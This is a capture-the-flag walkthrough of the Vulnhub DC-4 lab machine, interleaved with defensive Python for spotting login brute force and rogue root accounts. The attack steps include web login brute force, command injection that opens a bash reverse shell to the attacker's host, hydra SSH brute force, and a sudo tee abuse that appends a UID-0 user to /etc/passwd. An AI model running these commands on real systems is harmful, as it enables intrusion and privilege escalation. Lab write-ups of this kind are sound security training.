Vulnhub DC_4

Introduction

vulnhub dc 4

https://www.vulnhub.com/entry/dc-4,313/

Target IP

192.168.1.11

Information Gathering

nmap -p- --min-rate 10000 192.168.1.11 -oN nmap/port.txt

nmap -sT -sC -sV -O -p22,80 192.168.1.11 -oN nmap/detail.txt

  • Operating system: Linux 3.2 - 4.14 (Debian)
  • Ports: 22 (OpenSSH 7.4p1), 80 (nginx 1.15.10)

gobuster dir -u http://192.168.1.11/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .txt,.php,.js,.html -t 50

[08:11:16] 301 -  170B  - /css     ->  http://192.168.1.11/css/
[08:11:23] 301 -  170B  - /images  ->  http://192.168.1.11/images/

Nothing useful there.

Brute Force

Port 80 serves a login form. The page source reveals nothing, and SQL injection attempts fail.

Brute force seems to be the only route left.

Capturing the request in Burp shows the credentials are sent in plaintext, but the response carries no "wrong username or password" message to key on.

Trying a brute-force attack anyway: it succeeds.

Credentials obtained:

admin:happy
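The login form above gives no error feedback, so a defender watching the nginx access log cannot separate good from bad logins by response; request rate per source is the practical signal. This is an added detection example, not part of the original write-up; the log lines are constructed, and the login path /login.php is an assumption (the write-up does not name it).

```python
import re
from collections import defaultdict
from datetime import datetime

# Constructed nginx "combined"-format access-log lines (not captured from the box).
# The login path /login.php is an assumption; the write-up does not name it.
SAMPLE_LOG = "\n".join(
    f'192.168.1.17 - - [20/Feb/2026:21:25:{i:02d} +0800] '
    f'"POST /login.php HTTP/1.1" 200 612 "-" "Mozilla/5.0"'
    for i in range(8)
) + "\n" + "\n".join([
    '192.168.1.20 - - [20/Feb/2026:21:25:30 +0800] "GET /css/style.css HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '192.168.1.20 - - [20/Feb/2026:21:25:31 +0800] "POST /login.php HTTP/1.1" 200 612 "-" "Mozilla/5.0"',
])

LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)

def parse_line(line):
    """Return a dict for one access-log line, or None if it does not match."""
    m = LINE_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.strptime(rec["ts"], "%d/%b/%Y:%H:%M:%S %z")
    return rec

def find_bruteforce(log_text, login_path="/login.php", threshold=5, window_s=60):
    """Map IP -> total login POSTs for every IP that sent more than `threshold`
    POSTs to `login_path` inside any `window_s`-second sliding window.
    The form gives no error feedback, so status codes do not separate
    success from failure here; the per-source request rate is what is left."""
    per_ip = defaultdict(list)
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec and rec["method"] == "POST" and rec["path"] == login_path:
            per_ip[rec["ip"]].append(rec["ts"])
    offenders = {}
    for ip, times in per_ip.items():
        times.sort()
        lo = 0
        for hi in range(len(times)):
            # Shrink the window from the left until it spans <= window_s seconds.
            while (times[hi] - times[lo]).total_seconds() > window_s:
                lo += 1
            if hi - lo + 1 > threshold:
                offenders[ip] = len(times)
                break
    return offenders
```

With the constructed sample, only 192.168.1.17 (eight POSTs in eight seconds) is reported; the single POST from 192.168.1.20 is not.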

RCE

The admin area is a command execution panel.

Capturing the request shows that the parameter carries the command to execute:

radio=ls+-l&submit=Run

Reverse Shell

curl -X POST http://192.168.1.11/command.php \
-H "Cookie: PHPSESSID=u8qlergatfe52bkor6q6iatcv1" \
-d "radio=bash -c 'bash -i >%26 /dev/tcp/192.168.1.17/6666 0>%261'&submit=Run"

Lateral Movement

find / -perm -4000 2>/dev/null

The SUID search turns up a suspicious file, /home/jim/test.sh, which is also world-writable (mode 777):

-rwsrwxrwx 1 jim jim 174 Apr  6  2019 /home/jim/test.sh

# 1. Overwrite test.sh
echo '#!/bin/bash' > /home/jim/test.sh
echo '/bin/bash' >> /home/jim/test.sh

# 2. Run it
/home/jim/test.sh

This fails: the shell is still running as the web-server user, because the kernel ignores the SUID bit on interpreted scripts. Jim's home directory does, however, contain a backup password list, old-passwords.bak.

Save it and use it to brute-force SSH:

hydra -l jim -P pass.txt ssh://192.168.1.11

Credentials obtained:

jim:jibril04

The mbox file in jim's home directory is readable:
From root@dc-4 Sat Apr 06 20:20:04 2019
Return-path: <root@dc-4>
Envelope-to: jim@dc-4
Delivery-date: Sat, 06 Apr 2019 20:20:04 +1000
Received: from root by dc-4 with local (Exim 4.89)
(envelope-from <root@dc-4>)
id 1hCiQe-0000gc-EC
for jim@dc-4; Sat, 06 Apr 2019 20:20:04 +1000
To: jim@dc-4
Subject: Test
MIME-Version: 1.0
Content-Type: text/plain; charset="UTF-8"
Content-Transfer-Encoding: 8bit
Message-Id: <E1hCiQe-0000gc-EC@dc-4>
From: root <root@dc-4>
Date: Sat, 06 Apr 2019 20:20:04 +1000
Status: RO

This is a test.

A single e-mail, which tells us:

  • Mail server: Exim 4.89
  • Sender: root@dc-4
  • Recipient: jim@dc-4
  • Date: 6 April 2019
  • Body: just a test message

Next, find where mail is stored.

jim's mailbox is found under /var/spool/mail:
From charles@dc-4 Sat Apr 06 21:15:46 2019
Return-path: <charles@dc-4>
Envelope-to: jim@dc-4
Delivery-date: Sat, 06 Apr 2019 21:15:46 +1000
Received: from charles by dc-4 with local (Exim 4.89)
(envelope-from <charles@dc-4>)
id 1hCjIX-0000kO-Qt
for jim@dc-4; Sat, 06 Apr 2019 21:15:45 +1000
To: jim@dc-4
Subject: Holidays
MIME-Version: 1.0
Content-Type: text/plain; charset="UTF-8"
Content-Transfer-Encoding: 8bit
Message-Id: <E1hCjIX-0000kO-Qt@dc-4>
From: Charles <charles@dc-4>
Date: Sat, 06 Apr 2019 21:15:45 +1000
Status: O

Hi Jim,

I'm heading off on holidays at the end of today, so the boss asked me to give you my password just in case anything goes wrong.

Password is: ^xHhA&hvim0y

See ya,
Charles

Credentials obtained:

charles:^xHhA&hvim0y

Privilege Escalation via teehee

Log in as charles.

/usr/bin/teehee can be run with sudo.

GTFOBins has no entry for it, so look at the program's own help:
charles@dc-4:~$ /usr/bin/teehee  --help
Usage: /usr/bin/teehee [OPTION]... [FILE]...
Copy standard input to each FILE, and also to standard output.

-a, --append append to the given FILEs, do not overwrite
-i, --ignore-interrupts ignore interrupt signals
-p diagnose errors writing to non pipes
--output-error[=MODE] set behavior on write error. See MODE below
--help display this help and exit
--version output version information and exit

MODE determines behavior with write errors on the outputs:
'warn' diagnose errors writing to any output
'warn-nopipe' diagnose errors writing to any output not a pipe
'exit' exit on error writing to any output
'exit-nopipe' exit on error writing to any output not a pipe
The default MODE for the -p option is 'warn-nopipe'.
The default operation when --output-error is not specified, is to
exit immediately on error writing to a pipe, and diagnose errors
writing to non pipe outputs.

GNU coreutils online help: <http://www.gnu.org/software/coreutils/>
Full documentation at: <http://www.gnu.org/software/coreutils/tee>
or available locally via: info '(coreutils) tee invocation'

It can append to files, so try appending to /etc/passwd.

Create a hack user with UID 0:

openssl passwd -1 -salt hack password
echo 'hack:$1$hack$Qfvz92fBAtSC9ccCE6BES0:0:0:root:/root:/bin/bash' | sudo /usr/bin/teehee -a /etc/passwd

Success, and the flag is obtained.

[ASCII-art "Well done" banner]


Congratulations!!!

Hope you enjoyed DC-4. Just wanted to send a big thanks out there to all those
who have provided feedback, and who have taken time to complete these little
challenges.

If you enjoyed this CTF, send me a tweet via @DCAU7.
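Two of the weaknesses used above (the world-writable SUID script in jim's home, and the UID-0 "hack" entry appended to /etc/passwd through sudo teehee) are easy to catch in a local audit. The following is an added defensive example, not part of the original write-up; the /etc/passwd excerpt and the file-mode list are constructed, and the hash is a placeholder.

```python
import stat

# Constructed /etc/passwd excerpt (not copied from the box): the last line has the
# shape of the appended "hack" entry from the write-up, with a placeholder hash.
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
jim:x:1001:1001:jim,,,:/home/jim:/bin/bash
charles:x:1002:1002:charles,,,:/home/charles:/bin/bash
hack:$1$hack$PLACEHOLDERHASH:0:0:root:/root:/bin/bash
"""

# Constructed (path, st_mode) pairs as os.lstat() would report them.
# 0o104777 = regular file, SUID set, rwxrwxrwx: the test.sh case from the write-up.
SAMPLE_FILES = [
    ("/usr/bin/sudo", 0o104755),
    ("/usr/bin/passwd", 0o104755),
    ("/home/jim/test.sh", 0o104777),
    ("/usr/bin/teehee", 0o100755),
]

def rogue_root_accounts(passwd_text):
    """Flag UID-0 entries other than root, and entries whose password field holds
    a hash instead of 'x' (bypassing /etc/shadow). The appended line trips both."""
    findings = []
    for n, line in enumerate(passwd_text.splitlines(), 1):
        fields = line.split(":")
        if len(fields) != 7:
            findings.append((n, line, "malformed entry"))
            continue
        name, pw, uid = fields[0], fields[1], fields[2]
        if uid == "0" and name != "root":
            findings.append((n, name, "non-root account with UID 0"))
        if pw.startswith("$"):
            findings.append((n, name, "password hash stored in /etc/passwd"))
    return findings

def writable_setuid_files(entries):
    """Return SUID/SGID files writable by group or world. Linux ignores the SUID
    bit on interpreted scripts, so test.sh is not an escalation by itself, but
    a file other users run that anyone can rewrite is still worth fixing."""
    hits = []
    for path, mode in entries:
        setid = mode & (stat.S_ISUID | stat.S_ISGID)
        writable = mode & (stat.S_IWGRP | stat.S_IWOTH)
        if setid and writable:
            hits.append(path)
    return hits
```

On a real host, feed `open("/etc/passwd").read()` and `os.lstat(p).st_mode` values for the paths from `find / -perm -4000` into the two functions.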

Source: http://xiaowu5.cn/2026/02/20/Vulnhub-DC-4/
Author: 5 | Published: 20 February 2026 | License: BY XIAOWU